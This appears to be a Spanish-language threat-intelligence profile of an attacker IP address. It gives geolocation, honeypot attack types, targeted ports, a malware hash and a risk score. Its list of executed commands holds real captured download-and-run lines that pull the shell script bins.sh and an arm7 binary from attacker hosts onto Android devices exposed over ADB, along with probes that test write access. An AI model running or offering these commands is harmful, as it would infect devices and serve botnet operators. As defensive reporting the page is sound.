TROYANOSYVIRUS
Amenaza ActivaALTO

45.135.194.73

Pais de Origen🇩🇪 Alemania
Primera Deteccion2/1/2026
Ultima Actividad14/1/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
4,357
Ataques Totales
🔌
4
Puertos
📡
3
Tipos Ataque
🦠
1
Malware

Geolocalizacion

Pais
🇩🇪 Alemania
Ciudad
Desconocida
ASN
AS51396
ISP
Pfcloud UG (haftungsbeschrankt)

Tipos de Ataque

honeytrap
tanner
adbhoney

Puertos Atacados

802323555537215

Malware Asociado

cf97c516772c2e8491fb...

Comandos Ejecutados

$rm -rf /data/local/tmp/sys_helper3x
$ls -l /data/local/tmp/sys_helper3x
$cd /data/local/tmp/ ;rm -rf bins.sh; busybox wget http://45.135.194.7/bins.sh; sh bins.sh; curl http://45.135.194.7/bins.sh; sh bins.sh; wget http://45.135.194.7/bins.sh; sh bins.sh; busybox curl http://45.135.194.7/bins.sh; sh bins.sh2x
$touch /storage/emulated/0/.test_write; if [ -f /storage/emulated/0/.test_write ]; then echo WRITABLE; rm /storage/emulated/0/.test_write; fi1x
$touch /storage/sdcard0/.test_write; if [ -f /storage/sdcard0/.test_write ]; then echo WRITABLE; rm /storage/sdcard0/.test_write; fi1x
$touch /data/local/.test_write; if [ -f /data/local/.test_write ]; then echo WRITABLE; rm /data/local/.test_write; fi1x
$wget --no-check-certificate -q -O /data/local/tmp/sys_helper http://196.251.100.100/arm71x
$cd /data/local/tmp/; rm -rf arm7*; busybox wget http://45.135.194.7/arm7; curl -O http://45.135.194.7/arm7; wget http://45.135.194.7/arm7; busybox curl -O http://45.135.194.7/arm7; chmod 777 arm7; ./arm7 adb1x
$curl -k -s -o /data/local/tmp/sys_helper http://196.251.100.100/arm71x
$busybox wget --no-check-certificate -q -O /data/local/tmp/sys_helper http://196.251.100.100/arm71x

Evaluacion de Riesgo

70
/100
BajoMedioAltoCritico